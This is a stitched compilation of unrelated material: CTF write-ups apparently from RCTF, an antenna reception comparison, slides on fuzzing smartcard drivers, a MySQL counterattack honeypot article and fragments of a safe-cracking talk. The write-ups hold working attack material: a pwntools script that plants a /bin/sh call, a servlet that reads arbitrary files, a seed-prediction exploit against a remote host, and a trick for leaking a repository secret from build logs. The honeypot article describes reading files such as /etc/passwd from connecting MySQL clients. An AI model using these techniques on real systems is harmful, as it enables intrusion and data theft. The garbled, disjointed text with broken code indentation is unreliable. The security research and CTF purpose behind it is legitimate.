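A minimal interaction sketch of the input above (hypothetical pwntools harness; per the notes, 4344160 is 0x424960, i.e. sub_424960, and 4367680 = 0x42A540 is assumed to be the address of a /bin/sh string):
from pwn import *

p = process("./two_shortest")   # assumed local binary name
p.sendline(b"1 2")              # header, followed by two crafted "edges"
# Unchecked matrix indices turn each edge into an arbitrary bss write:
# the edge weight lands at an attacker-chosen address.
p.sendline(b"453 145 4367680")  # assumed: plants the /bin/sh address (0x42A540) into unk_4E8340
p.sendline(b"456 221 4344160")  # plants sub_424960 (0x424960) into off_4E9730
p.interactive()                 # exit() then calls off_4E9730(unk_4E8340)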
Crypto
Uncommon Factors I
from Crypto.Util.number import bytes_to_long
from gmpy2 import mpz
import gmpy2
from tqdm import tqdm
with open("lN.bin","rb") as f:
data = f.read()
n = []
for i in tqdm(range(2**22)):
    n.append(mpz(bytes_to_long(data[64*i:64*i+64])))
for i in tqdm(range(19)):
    new_n = []
    for j in range(len(n)//2):
        new_n.append(mpz(n[2*j]*n[2*j+1]))
    n = new_n
for i in range(len(n)):
    for j in range(i+1,len(n)):
        print(i,j,gmpy2.gcd(n[i],n[j]))
Uncommon Factors II
from Crypto.Util.number import bytes_to_long
with open("lN2.bin","rb") as f:
data = f.read()
N = []
for i in range(128):
    N.append(bytes_to_long(data[64*i:64*i+64]))
from itertools import permutations
P_bits = 312
Q_bits = 200
R_bits = 304
X = 2**R_bits
m = len(N)
PR = PolynomialRing(ZZ, names=[str('x%d' % i) for i in range(1, 1 + m)])
h = 3
u = 1
variables = PR.gens()
gg = []
monomials = [variables[0]**0]
for i in range(m):
    gg.append(N[i] - variables[i])
    monomials.append(variables[i])
print(len(monomials), len(gg))
print('monomials:', monomials)
B = Matrix(ZZ, len(gg), len(monomials))
for ii in range(len(gg)):
    for jj in range(len(monomials)):
        if monomials[jj] in gg[ii].monomials():
            B[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj]([X] * m)
B = B.LLL()
print('-' * 32)
new_pol = []
for i in range(len(gg)):
    tmp_pol = 0
    for j in range(len(monomials)):
        tmp_pol += monomials[j](variables) * B[i, j] / monomials[j]([X] * m)
    new_pol.append(tmp_pol)
if len(new_pol) > 0:
    Ideal = ideal(new_pol[:m-1])
    GB = Ideal.groebner_basis()
    function_variables = var([str('y%d' % i) for i in range(1, 1 + m)])
    res = solve([pol(function_variables) for pol in GB], function_variables)
    print('got %d basis' % len(GB))
    print('solved result:')
    print(res)
    for tmp_res in res:
        PRRR.<x, y> = PolynomialRing(QQ)
        q = abs(PRRR(res[0][0](x, y)).coefficients()[0].denominator())
        p = N[-1] // q
        print(p)
BlockChain
EasyFJump
Decompiled bytecode:
contract translate{
bytes32 a;
bytes32 b;
bytes32 c;
bytes32 d;
function _0b21d525(bytes memory x) public{
a = msg.data[0x04:0x24];
b = msg.data[0x24:0x44];
c = msg.data[0x44:0x64];
}
function _89068995() public{
bytes32 i = 0x0335;
d1 = func_02F8() == 0x01f06512dec2c2c6e8ab35
d2 = func_02F8() == 0x02b262ac4c65fddc17c7d5
d3 = func_02F8() == 0x02125ed5d7ddf56b0eba28
d4 = func_02F8() == 0x018fbbc52638a0f3d00fee
bytes32 i = 0x00d8;
var3 = (a - b - c) & 0xffff;
target = 0x00d8 +msg.value - var3 == 0x01B;
}
function func_02F8() private{
var var0 = 0x00;
var var1 = c;
var var2 = d * a + b;
require(c!=0);
d = (d * a + b) %c;
return d;
}
}
from math import gcd
from Crypto.Util.number import inverse
from functools import reduce
data = [0x0259c30dc979a94f999,0x01f06512dec2c2c6e8ab35,0x02b262ac4c65fddc17c7d5,0x02125ed5d7ddf56b0eba28,0x018fbbc52638a0f3d00fee]
delta = [d1 - d0 for (d0, d1) in zip(data, data[1:])]
m_mul = [d0 * d2 - d1 * d1 for (d0, d1, d2) in zip(delta, delta[1:], delta[2:])]
m = reduce(gcd, m_mul)
a = delta[1]*inverse(delta[0],m)%m
b = (data[1]-data[0]*a)%m
print(a, b, m)
HackChain
Partial reversal:
contract Contract{
event ForFlag(address addr);
struct Func {
function() internal f;
}
function execure(address addr){
    require(address(this).balance == addr&0x0fff); // the address ends in 0xea8
    (bool success, bytes memory ??) = addr.delegatecall(
abi.encodeWithSignature("execure(address)", addr?)
);
require(!success);
require(data[:4] == keccak256(0x676574666c61672875696e7432353629)[:4]);
assembly {
mstore(func, sub(add(mload(func), data[4:]), address(this).balance))
} // 0x4c3
func.f(); // => 0x3c6
}
}
Crafted contract 1:
contract exp{
fallback(bytes calldata) external returns(bytes memory a){
assembly{
mstore8(0,0xdd)
mstore8(1,0xdc)
mstore8(2,0x5b)
mstore8(3,0xbf)
mstore(4,0xc8f)
revert(0,0x24)
}
}
}
Crafted contract 2:
bytes contractBytecode = hex"6080604052348015600f57600080fd5b50606b80601d6000396000f3fe6080604052348015600f57600080fd5b50600036606060dd60005360dc600153605b60025360bf600353610c8f60045260246000fdfea26469706673582212204fb9a4d0ca8ea1d456a492ddd96c0fba225975532a908355f8e9f8f1b97dfcf364736f6c63430008000033";
function deploy(bytes32 salt) public{
bytes memory bytecode = contractBytecode;
address addr;
assembly {
addr := create2(0, add(bytecode, 0x20), mload(bytecode), salt)
}
}
}
Send the deployment tx to create contract 3 (0xbfe391bac53c9df7696aedc915f75ca451f66bad), then finally call execure with 0xbfe391bac53c9df7696aedc915f75ca451f66bad.
Misc
ezshell
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
public class test123 {
    public void e(Object request, Object response){
        HttpServletRequest httpServletRequest=(HttpServletRequest)request;
        HttpServletResponse httpServletResponse=(HttpServletResponse)response;
        File file = new File(httpServletRequest.getParameter("file"));
        InputStream in = null;
        try{
            in = new FileInputStream(file);
            int tempbyte;
            while ((tempbyte = in.read()) != -1) {
                httpServletResponse.getWriter().write(tempbyte);
            }
        }catch (Exception e){
        }
    }
}
monopoly
Play Monopoly; win on hard mode and you get the flag.
After finishing a hard-mode game the player state is not cleared, so you can save-scum it.
Each restart lets you reload a random seed, the AI always moves after the player, the player then takes one more step, and if you then quit, the player moves first again next game.
Money and position survive the reload, but property data is cleared, so the only way to earn money is the chance squares. The chance rolls also come from rand(), so they are predictable as well; just arrange for the "double your money" outcome every time.
from pwn import *
import ctypes
# context.log_level = 'DEBUG'
cdll = ctypes.CDLL('./libc-2.27.so')
p = remote('123.60.25.24', 20031)
p.recvuntil('what\'s your name?')
p.sendline('acdxvfsvd')
money = 0
ai_money = 0
pos = 0
ai_pos = 0
types = [1] * 64
types[0] = 0
types[16] = 2
types[32] = 2
types[48] = 2
types[11] = 2
types[19] = 2
types[26] = 2
types[37] = 2
types[56] = 2
types[3] = 3
types[22] = 3
types[40] = 3
types[51] = 3
def new_game(seed):
    p.recvuntil('3. hard level!!!!')
    p.recvuntil('input your choice>>')
    p.sendline('3')
    p.recvuntil('you choice hard level, you can choice a seed to help you win the game!')
    p.sendline(str(seed))
def player_turn():
    global pos, ai_pos
    p.recvuntil('your money: ')
    money = int(p.recvline().strip())
    p.recvuntil('acdxvfsvd throw')
    val = int(p.recvuntil(',')[:-1])
    p.recvuntil('now location:')
    pos = int(p.recvuntil(',')[:-1])
    log.info("player money {}, throw {}, pos {}".format(money, val, pos))
    p.recvline()
    if pos == 0:
        return '0'
    nex = p.recvline()
    if ('free parking' in nex):
        owner = 'free'
    elif 'owner' in nex:
        owner = nex[nex.index(':')+1:].strip()
    elif ('chance' in nex):
        owner = 'chance'
    else:
        print nex
    log.info('owner {}'.format(owner))
    return owner
def ai_turn():
    global ai_pos
    p.recvuntil('ai money: ')
    ai_money = int(p.recvline().strip())
    p.recvuntil('AI throw')
    val = int(p.recvuntil(',')[:-1])
    p.recvuntil('now location:')
    ai_pos = int(p.recvuntil(',')[:-1])
    log.info("ai money {}, throw {}, pos {}".format(ai_money, val, ai_pos))
    p.recvline()
    if (ai_pos == 0):
        return '0'
    nex = p.recvline()
    if ('free parking' in nex):
        owner = 'free'
    elif 'owner' in nex:
        owner = nex[nex.index(':')+1:].strip()
    elif ('chance' in nex):
        owner = 'chance'
    else:
        print nex
    log.info("owner {}".format(owner))
    return owner
def calculate_seed():
    flag = 0
    for i in range(1, 13):
        if (types[(i + pos) % 64] == 3):
            flag = 1
        elif (flag == 0 and types[(i + pos) % 64] == 2 or types[(i + pos) % 64] == 0):
            flag = 2
    print('flag', flag)
    for seed in range(1, 100000000):
        cdll.srand(seed)
        if (flag == 1):
            r1 = (cdll.rand() & 0xff) % 0xc + 1
            next_pos = (pos + r1) % 64
            if (types[next_pos] != 3):
                continue
            chance = cdll.rand() & 0xff
            # print(hex(chance))
            if (chance <= 0xef):
                continue
            # return seed
        # elif (flag == 2):
        #     r1 = (cdll.rand() & 0xff) % 0xc + 1
        #     next_pos = (pos + r1) % 64
        #     if (types[next_pos] != 0 and types[next_pos] != 2):
        #         continue
        #     return seed
        else:
            r1 = (cdll.rand() & 0xff) % 0xc + 1
            next_pos = (pos + r1) % 64
            # if (types[next_pos] == 2):
            #     chance = cdll.rand() & 0xff
            #     if (chance <= 0x9f):
            #         continue
        r2 = (cdll.rand() & 0xff) % 0xc + 1
        ai_next_pos = (ai_pos + r2) % 64
        if (types[ai_next_pos] == 2):
            chance = cdll.rand() & 0xff
        r3 = (cdll.rand() & 0xff) % 0xc + 1
        print(pos, r1, ai_pos, r2)
        n_next_pos = (pos + r1 + r3) % 64
        # if (types[n_next_pos] not in [2,0,1]):
        if (types[n_next_pos] == 1):
            log.info('Stage 1 Seed {}'.format(seed))
            return seed, types[n_next_pos]
new_game(17)
for i in range(4):
    print(i)
    x = player_turn()
    if (x == 'nobody'):
        p.sendline('2')
    elif (x == 'acdxvfsvd'):
        p.sendline('2')
    a = ai_turn()
x = player_turn()
while (x in ['free', '0', 'chance']):
    a = ai_turn()
    x = player_turn()
p.sendline('4')
seed, new_type = calculate_seed()
new_game(seed)
print types
# iter 5 val 54
p.sendline('4')
p.sendline('3')
p.sendline('54')
p.interactive()
checkin
A GitHub Actions challenge: the goal is to leak a repository secret.
GitHub Actions logs replace any string matching a secret with asterisks, so post all the numbers 00000 - 99999 in an issue and read the Actions build log; whichever number got starred out is the secret.
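Generating the issue body is a one-liner (a quick sketch of the idea):
# Post this as the issue body; the Actions log masks whichever line matches the secret.
print("\n".join("%05d" % i for i in range(100000)))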
coolcat
Each pixel's destination is given by a binary recurrence, so build matrices:
mat1 = [ x  y ],  mat2 = [ 1    p  ]
                         [ q  p+q ]
Then destpos = mat1 * mat2**m, where p, q and m form the key.
It is easy to craft a special mat1 and directly read off (mat2**m) % 600:
(mat2**m) % 600 =
(409 336)
(336 433)
By the associativity of matrix multiplication, every pixel's destination can then be solved.
Decryption script:
k=cv2.imread("enced.jpg")
o=np.zeros((600,600,3),'uint8')
for i in range(600):
for j in range(600):
o[i][j]=k[(i*409+j*336)%600][(i*336+j*433)%600]
print(o)
cv2.imwrite("out.jpg",o)
RCTF{RCTFNB666MyBaby}
welcome_to_rctf
Check-in.
FeedBack
Check-out survey.
Antenna comparison
20 antennas were tested to see which ones were the best for receiving.
All the antennas are 3/4" Motorola TAD/TAE mount (aka "NMO").
The following lists are ordered as per what you see in the picture (left to right).
General information:
Manufacturer Model Type Freq rating/gain
------------------- ------------------ ---------------------------------------------- -------------------------
Larsen NMO-27 (new style) 1/4 wave base loaded 27-28/0dB
Radiall/Larsen NMO-27B 1/4 wave base loaded 27-28/0dB
Larsen NMO-30B 1/4 wave base loaded 30-40/0dB
Larsen NMO-50C 1/4 wave base loaded 47-54/0dB
Larsen NMO-2/70 (old style) loaded 1/2 (VHF), closed coil collinear (UHF) 144-148/6dB 440-450/3.5dB
Larsen NMO-150 (new style) 5/8 wave base loaded 144-148/3dB
Larsen NMO-Q 1/4 wave 150-170/0dB
Larsen NMO-Q 1/4 wave 95-105/0dB
Antenna Specialists ASPRD1615 1/4 wave 430-470/0dB
Maxrad BMUF9000 1/4 wave 896-940/0dB
Larsen NMO-450 5/8 over 1/2 wave closed coil collinear 450-470/3.4dB
Motorola TDE6082A (?) closed coil collinear 460-470/5dB
Larsen NMO-UHF 5/8 over 1/4 wave open coil collinear 450-470/3.2dB
Maxrad BMUF8125 1/2 over 1/2 over 1/4 wave open coil trilinear 806-866/5dB
Maxrad BMUF9043 1/2 over 1/4 wave open coil collinear elevated 896-940/3dB
Larsen NMO-800 5/8 over 1/2 wave closed coil collinear 806-866/3.4dB
Maxrad unknown 5/8 over 1/2 wave open coil collinear 806-866/3.4dB
Larsen NMO3E825B 5/8 over 1/4 wave closed coil collinear 825-896/3.2dB
Larsen NMO5E825B 5/8 over 5/8 over 1/4 wave closed coil trilinear 825-896/5dB
Maxrad BMAXSCAN1000 double 1/2 over 1/4 closed coil collinear (800) VHF/UHF/800
Performance:
Model                LW AM SW CB VHF-Lo FM Air VHF-150 VHF-165 VHF-TV 220 MilAir UHF-Lo UHF-Hi UHF-TV 800 900
-------------------- -- -- -- -- ------ -- --- ------- ------- ------ --- ------ ------ ------ ------ --- ---
NMO-27 (new style) 2 5 5 7 2 2 - - - 2 1 - 2 - 2 6 4
NMO-27B - 1 4 7 5 4 4 2 3 4 4 1 2 1 5 4 4
NMO-30B - 1 4 7 5 4 2 1 2 4 5 - 2 1 5 1 3
NMO-50C - 1 2 2 7 5 3 7 6 5 3 - 1 - 3 2 4
NMO-2/70 (old style) - - 1 - 2 4 3 6 7 6 5 2 8 8 5 3 4
NMO-150 (new style) 2 6 5 4 5 5 4 7 5 5 5 - 2 2 1 1 1
NMO-Q (150-170) 1 4 3 2 2 4 5 4 8 6 5 3 5 4 5 4 4
NMO-Q (95-105) 1 5 5 2 4 6 5 3 5 5 2 1 4 2 5 3 5
ASPRD1615 - 2 3 - 1 3 1 1 2 4 2 1 7 6 4 5 5
BMUF9000 - 1 1 - 1 1 - 1 1 3 1 - 1 1 4 7 6
NMO-450 2 5 5 3 4 6 5 2 6 5 2 2 6 5 4 5 6
TDE6082A (?) 2 6 5 3 5 6 4 2 4 5 5 1 5 4 3 2 5
NMO-UHF 2 5 5 2 4 6 4 2 5 5 2 1 6 5 4 5 6
BMUF8125 - 6 5 2 5 6 5 3 5 5 5 1 2 - 4 6 7
BMUF9043 1 7 5 3 2 5 6 5 6 6 5 2 2 1 5 7 7
NMO-800 1 6 5 4 3 5 5 4 8 6 6 3 4 3 6 8 8
Maxrad (800) - 3 2 3 2 5 4 3 6 6 5 1 2 2 5 6 4
NMO3E825B - 5 5 2 1 5 3 2 6 6 5 2 3 2 6 6 4
NMO5E825B 1 6 5 3 3 6 5 3 5 5 2 2 1 1 3 6 4
BMAXSCAN1000 - 3 5 2 2 5 5 4 6 6 5 1 7 6 6 4 5
- = Absolutely no reception
1 = Extremely bad reception, you might barely receive some very strong stations.
2 = Bad reception, strong stations come in very weak but can be heard.
3 = Limited range reception, stations come in about 1/4 - 1/2 the strength compared to an average antenna for this band.
4 = Below average reception, stations come in about 3/4 the strength compared to an average antenna for this band.
5 = Average reception. Stations come in at reasonable levels.
6 = Slightly above average reception, perhaps 1/2 to 1 S-Unit above an average antenna.
7 = Above average reception, perhaps 1 to 1.5 S-Units above an average antenna.
8 = Great reception, perhaps 2 S-Units above an average antenna.
9 = Too good to be true.
All tests were done with an AOR-3000 receiver.
Minimum of 5 measurements per band from fixed stations at varying distances and power levels.
Comments:
Yes, I know the NMO-30B has the wrong whip in the picture. I tested it with the correct whip.
The MilAir readings are somewhat pessimistic since all I had were a handful of
weak stations to test against. It wouldn't be unreasonable to knock the numbers
up a few notches to estimate how it would perform in general operation.
The lower-frequency base-loaded antennas tend to block out VHF/UHF, most likely
because of impedance issues where the coax couples to the loading coil. Its
interesting to note how the 3rd-generation Larsen NMO-27B has partial VHF reception
while the 2nd-generation NMO-27 does not. My guess is that Larsen made an engineering
change to accommodate CB radios like the Cobra-29WX which include a VHF weather-band
receiver. Another interesting thing to note is the 800mhz reception. While I certainly
wouldn't count on a low-band antenna for 800mhz, whats likely happening is the loading
coil itself is acting as the receiving antenna given the short wavelength of the signal.
The Larsen dual-bander (NMO-2/70) is totally deaf below VHF. Probably another loading
coil impedance issue since it will have a base-load to correctly match the half-wave
VHF radiator.
The Larsen NMO-150 works great for VHF, shortwave and AM but chokes on UHF and 800.
The quarter-waves and other antennas lacking a base-load (800mhz collinears, etc) all
seem to work great at lower frequencies, since there are no impedance issues with
loading coil coupling. Likewise the lower freqs see it as a chunk of wire, minus some
miscellaneous impedances when it hits the coils on the antenna rod. The only exceptions
to this rule are the UHF and 800/900mhz quarter-waves where the antenna is physically
too short to have any receive efficiency on the lower frequencies.
As per the above note, the open-coil Larsen NMO-UHF turned out to be a real
winner. While slightly less performing on 800/900 since its not designed for
it, this would be a great selection for an "all-band" antenna to connect to
a wideband receiver like an AOR or a Yupiteru.
Now for the curve-ball. Look at the Larsen NMO-800. Given its short size I kind
of scratched my head at the lower-frequency performance, but the tests don't lie.
Nonetheless I probably wouldn't count on it compared to the much longer NMO-UHF
for broadband reception, but if very small size was a requirement this would definitely
be my second choice for a compact antenna. Notice the performance difference compared
to the Maxrad 800 which is of identical size and electrical design, with the only
difference being an open coil compared to a closed coil. Even the most minor differences
can make a large impact on performance.
So.. my first choice for a compact antenna would be the Maxrad BMAXSCAN1000, since
it has much better UHF performance than the NMO-800, and reasonable performance
on the other bands.
I had hoped to see the Maxrad elevated 800mhz trilinear be the winner since it
had the combination of long physical length, high 800mhz gain, and no base-load,
however it ended up being so-so on VHF and pretty crappy on UHF. Still not bad in
the overall scheme of things.
The big Motorola 5db UHF did surprisingly well on the lower bands, but the
thing is just too damn ugly to put on my car.
The Larsen 3E825 was one of their Nextel OEM's. The 5E825 was on a Larsen "Special"
base. The 5E825 was pretty awesome when it came to broadband operation, except it
was somewhat deaf on UHF which was sort of a party-pooper.
Now its brand-preference opinion time !!
First, always use NMO mounts. They are THE standard and give you the most
options for swapping antennas around on your car. You can also use them
for base antennas, just use a mobile L-bracket and screw it onto your mast
or whatever. Get some copper rod at the hardware store and attach 3 or 4 ground
radials to the mast (unless receiving only 800/900mhz with an antenna
designed not to require a ground).
Larsen and Maxrad are the way to go. On some models you can save a few bucks
and still retain quality with the Maxrad.
Don't use mag-mounts unless you really have to. I don't care what the manufacturer
says, they will scratch your paint. Not to mention they don't ground as well as
other mounting arrangements.
Drilling holes in your roof is the best way to go (performance-wise), but personally
I don't like turning my cars into Swiss-cheese. Go with L-Brackets on the hood
or rear deck, as it takes two minor side-drilled holes that won't be an issue
when you sell your car. Edge-mounting antennas like this will give a ground only
halfway around the base of the antenna which can make for less-than-optimal radiation
patterns, although I certainly haven't noticed any problems worth crying over.
Another great mount is the trunk-lip bracket. The Larsen ones are ugly and expensive.
Get the Maxrad. These require no holes and work great. Sometimes you need to do
minor antenna re-tuning on lower-frequency antennas since part of the radiated
signal will bounce off the metal on the roof of the car. Again, not a perfect
radiation pattern but certainly usable.
If you plan on receiving 800/900mhz using an NMO mount, check any cable that
you got with your antenna or bracket and see if its standard RG-58. If so, chuck
it and get an 800/900mhz NMO mounting kit that has RG-58 double-shield or better
cable (Cushcraft Ultralink for example). Despite the loss-per-hundred-feet ratings
on RG-58, you can suffer noticeable losses if you use it on short mobile cable runs.
Remember to pick up the twist-on "rain caps" for your antenna mounts and drop them
in your glove box. They cost like $1.50 each and come in handy if you need to stash
your antennas in the trunk when you park your car downtown, at long-term airport
parking, or in one of the less friendly neighborhoods.
Glass mounts suck for a variety of reasons. Single-band receive on 800mhz is about
the only worthwhile use for these terrible things. Make sure you don't have aftermarket
window tint and make sure your glass doesn't have carbon-impregnated tint. Best way
to tell is to look at the glass from an angle under bright sunlight with polarized
sunglasses and look for oval "splotches" in the glass. If you have this kind
of glass, the best way to get around it is to use a service monitor with on-glass
coupling boxes connected to the tracking generator and spectrum analyzer, then
hunt across the glass until you find a hot-spot that passes the signal good.
2-19-2003 Rich W7KI
Eric Sesterhenn <[email protected]>
2018
X41 D-SEC GmbH
https://www.x41-dsec.de/
whoami
• Eric Sesterhenn
• Principal Security Consultant
• Pentesting/Code Auditing at X41
Disclaimer
• The issues presented here have been
reported and fixed!
• These are open source projects - help them!
• I am not interested in testing / debugging
proprietary stuff in my spare time.
Targets
LINUX
LOGIN
Why?
• Smartcards control authentication!
• Authentication runs as root!
• Users and programmers
subconsciously trust the smartcard!
Smartcards
User
Smartcard
Reader
Reader Driver
(PC/SC)
Login
(pam)
Smartcard Driver
(OpenSC)
What is a Smartcard?
• Physical, tamper-proof device
• Designed to keep information secret
• Contains memory and a processor
https://en.wikipedia.org/wiki/Smart_card#/media/File:SmartCardPinout.svg
Application Protocol Data Unit
• APDUs form the protocol to talk to
smartcards
• ISO/IEC 7816-4 Identification cards
- Integrated circuit cards
• T=0 is character oriented / T=1 is
block-oriented
• Verify: 00 20 00 01 04 31323334
CLA: 1 byte | INS: 1 byte | P1: 1 byte | P2: 1 byte | LC: 0-3 bytes | Data: NC bytes
PC/SC API
• PC/SC API can be used on win and
*nix
• Other libraries have a similar
interface
LONG WINAPI SCardTransmit(
SCARDHANDLE
hCard,
LPCSCARD_IO_REQUEST pioSendPci,
LPCBYTE
pbSendBuffer,
DWORD
cbSendLength,
PSCARD_IO_REQUEST
pioRecvPci,
LPBYTE
pbRecvBuffer,
LPDWORD
pcbRecvLength
);
PKCS11
• PKCS11 is a platform independent
API for cryptographic token
• Supported by OpenSSL, browsers,...
(eg. via libp11)
• Windows uses smartcard Minidriver
now
• Driver for each card, uses ATR to
match
CK_RV C_FindObjectsInit(
CK_SESSION_HANDLE hSession,
CK_ATTRIBUTE_PTR pTemplate,
CK_ULONG ulCount
);
Smartcard Stack Summary
Application (pam)
PKCS11
PC/SC
APDU
Physical Card
Smartcard for Sign-On
PAM
Smartcard
CRLServer
GetCertificates
Certificate
Validate Certificate and User
RevocationCheck
CRL
GenerateNonce
SignRequestforNonce
Signature
CheckSignatureAgainstCertificate
Trust the Smartcard
• Driver developers trust the
smartcard!
• Let’s abuse that
• Mess with the card responses
# Bugs
Project
# Bugs
libykneomgr
1
OpenSC
Over 9000 ;-)
pam_pkcs11
1
smartcardservices
2
Yubico-Piv
2
No, I did not fuzz the &$#?@! out of it...
but guess which one I fuzzed the most ;-) Thanks to Frank Morgner for fixing!
Apple Smartcardservices
do {
cacreturn = cacToken.exchangeAPDU(command, sizeof(command), result, resultLength);
if ((cacreturn & 0xFF00) != 0x6300)
CACError::check(cacreturn);
...
memcpy(certificate + certificateLength, result, resultLength - 2);
certificateLength += resultLength - 2;
// Number of bytes to fetch next time around is in the last byte
// returned.
command[4] = cacreturn & 0xFF;
} while ((cacreturn & 0xFF00) == 0x6300);
OpenSC - CryptoFlex
u8 buf[2048], *p = buf;
size_t bufsize, keysize;
sc_format_path("I1012", &path);
r = sc_select_file(card, &path, &file);
if (r)
return 2;
bufsize = file->size;
sc_file_free(file);
r = sc_read_binary(card, 0, buf, bufsize, 0);
Popping calcs...
Basic Smartcard Exploitation in 2018
• Basiccard gives you nice control,...
yes BASIC!
• Example exploit (Kevin) will be
released to the public at beVX
• Other methods would be SIMtrace
or certain Javacards
YUBICO PIV
if(*out_len + recv_len - 2 > max_out) {
    fprintf(stderr, "Output buffer to small, wanted to write %lu, max was %lu.",
            *out_len + recv_len - 2, max_out);
}
if(out_data) {
    memcpy(out_data, data, recv_len - 2);
    out_data += recv_len - 2;
    *out_len += recv_len - 2;
}
Logging in...
Challenges in fuzzing a protocol
• Most modern fuzzers are file-oriented
• Radamsa: Generates a corpus of files
• Hongfuzz: passes a file (filename different each run)
• libfuzzer: passes a buffer and length
• AFL: passes a file
Challenges in fuzzing a protocol
• SCardTransmit() tells us how much data it expects
• Read this from a file on each call and error out if EOF
• No complicated poll handling like for network sockets required
How to fuzz - OpenSC
• reader-fuzzy.c
• Implements a (virtual) smartcard
reader interface
• Responds with malicious data read
from file (OPENSC_FUZZ_FILE)
• Have fun with AFL
American
Fuzz Lop
pkcs11-tool -t
libopensc
card-cac.c
reader-fuzzy.c
Fuzzing
File
Input
How to fuzz - Winscard and PC/SC
• Winscard(.dll) on Linux and Unix
• For proprietary code
• Preload the library
• Have fun with non-feedback fuzzers
(e.g. radamsa) or AFL in qemu
mode
How to fuzz - Winscard 2
• Tavis loadlibrary
• Extended to support Winscard
drivers
• Fuzz the windows drivers on linux
without all the overhead
Smartcard fuzzing
• Released now!
• https://github.com/x41sec/x41-
smartcard-fuzzing
pam_pkcs11: Replay an Authentication
PAM
Smartcard
CRLServer
GetCertificates
Certificate
Validate Certificate and User
RevocationCheck
CRL
RequestRandomNonce
Nonce
SignRequestforNonce
Signature
CheckSignatureAgainstCertificate
Roadblocks
• Channel back to card is quite limited
• Might need to use revocation list check for information leaks
• Interaction during exploitation not possible with basiccard, get SIMtrace for
that
• But: A single bitflip from false to true during login can be enough :)
Takeaways / Conclusions
• Think about trust models!
• Some security measures increase your attack surface big time!
• Fuzz Everything!
• Limit attack surface by disabling certain drivers.
• Do not write drivers in C ;-)
Thanks
• Q & A
• https://github.com/x41sec/x41-smartcard-
fuzzing
• [email protected]
• Sorry no Twitter... stalk me on LinkedIn if
you must ;-)
https://www.x41-dsec.de/
MySQL High-Interaction Counterattack Honeypot in Practice
0x00 Background
The MySQL client arbitrary-file-read "vulnerability" has been around for years. With the rise of attack-defense exercises, MySQL counterattack honeypots based on it keep appearing. Yet many commercial honeypots are built straight on top of open-source proof-of-concept scripts (see the references); trying to phish a red team with that level of polish is frankly an insult to their intelligence. So which pitfalls must be solved to take a MySQL counterattack honeypot from PoC to production? Let's go through them one by one.
0x01 Limitations of the PoC
The principle of the MySQL file-read vulnerability has been analyzed to death online, so we will not repeat it. First look at the flow of a typical PoC, shown below. After the client logs in and sends a query, the server answers with a file-read response, and the client dutifully hands the file over. At this point the server would normally return an OK_PACKET; on receiving it the client prints something like "Query OK, 0 rows affected (0.00 sec)". Answering a SELECT statement with "0 rows affected" makes no sense whatsoever, so the PoC simply drops the connection here, posing as a somewhat unstable MySQL server.
By now you have probably spotted it: this PoC reads only one file per query, and it disconnects afterwards, like a thief plugging his ears while stealing a bell. These two limitations reduce many MySQL counterattack honeypots to red-team IQ tests that contribute almost nothing in real engagements. How do we lift the two limitations? The answer, once more, lies in the MySQL protocol.
0x02 Reading Multiple Files at Once
The MySQL protocol spells out the flow of a query request (COM_QUERY; inserts, deletes, updates and selects all go through it), as in the diagram below.
For a COM_QUERY, the server can answer in four ways:
a result set (table data);
an ERR_PACKET (0xFF; the client prints "ERROR 1064 (42000): blabla....");
an OK_PACKET (0x00; the client prints "Query OK, 0 rows affected (0.00 sec) blabla...");
a local-file request (0xFB; the client sends the named file).
For the 0xFB response, once the client has finished sending the local data, the server is supposed to reply with an ERR_PACKET or an OK_PACKET to report success or failure. What the protocol leaves unsaid is what the client should do if the server instead sends a result set, or even another 0xFB file-read response. A quick experiment shows the client still treats it as a normal response and either renders the data or sends the file. That makes things interesting: we can slightly optimize the earlier PoC flow, as shown below.
After receiving a file, the server can immediately send another 0xFB file-read response; repeated over and over, a single query can fetch every file we need. Finally, the server sends one result-set response for the client to display, covering up everything that happened in between.
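To make the trick concrete, here is a minimal sketch of the packet such a honeypot emits (my own illustration, not the original demo; it assumes a raw TCP socket to an already-authenticated client, and standard MySQL framing: 3-byte little-endian length, 1-byte sequence id, then the payload, where 0xFB introduces the requested file path):
import struct

def local_infile_request(filename, seq):
    # Payload: the 0xFB marker followed by the path we want the client to upload.
    payload = b"\xfb" + filename.encode()
    # MySQL packet header: 3-byte little-endian length plus a 1-byte sequence number.
    header = struct.pack("<I", len(payload))[:3] + bytes([seq])
    return header + payload

# After a COM_QUERY arrives, keep asking for files before sending the final response:
# client_sock.sendall(local_infile_request("/etc/passwd", seq=1))
# data = client_sock.recv(65536)  # the client streams the file, then an empty packet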
0x03 High Interaction
As noted above, after receiving the file the server can return a result-set response for the client to display. How do we build that result set so it passes for a real MySQL service? The answer: proxy the SQL query to an actual MySQL server!
Borrowing the idea of an HTTP proxy, we can implement a MySQL proxy that:
forwards non-query requests (handshake, login, etc.) straight to the server;
intercepts query requests and emits file-read responses (looping to fetch several files);
once the file reads are done, forwards the original request to the real MySQL service.
With that, the skeleton of a high-interaction, well-camouflaged, counterattack-capable MySQL honeypot is in place.
0x04 Remaining Details and the Final Demo
Real code is of course never as simple as the diagrams; several small issues come up along the way:
1. handling the MySQL packet sequence numbers when intercepting requests;
2. handling TLS: recent MySQL versions enable TLS by default, so either turn it off or swap in your own certificate at the proxy;
3. during the handshake you can flip some capability flags so the client volunteers its client version, operating system, local username, and so on;
4. if you request a file that does not exist, the client refuses to process the following OK_PACKET and result set and prints a file-not-found error, but an ERR_PACKET with a plausible message (say error code 1040, Too many connections) covers that up nicely.
Finally, putting all of the above together, I wrote a simple demo in GoLang; the result is shown in the screenshot. DM me for the source code~
0x05 How the Red Team Can Defend Itself
Comparing different MySQL clients and connector libraries shows that JDBC fixed this problem in very old versions, and MySQL and MariaDB fixed it in newer releases (MySQL 8.0, MariaDB 10.3.1x). The latest Navicat, however, still ships libmariadb 10.1.46.0 and remains affected. So: don't use Navicat! It will bring you misfortune.
0xFF References
[1] MysqlHoneypot
[2] Rogue MySql Server
[3] The MySQL honeypot in HFish
[4] Using a MySQL honeypot to obtain an attacker's WeChat ID
[5] CSS-T | Mysql Client arbitrary file read attack chain extension
[6] MySQL protocol (COM_QUERY)
[7] MySQL protocol (MySQL Packet)
[8] MySQL protocol (Error Codes)
Nathan Seidle
Joel Bartlett
Rob Reynolds
Combos in 45
minutes or less!*
*Totes Guaranteed
2002
Credit: Me
Credit: Benjamin Rasmussen
Credit: Make Magazine
Credit: SparkFun
Credit: SparkFun
Credit: xkcd
Credit: SentrySafe / Liberty Safes
Power!
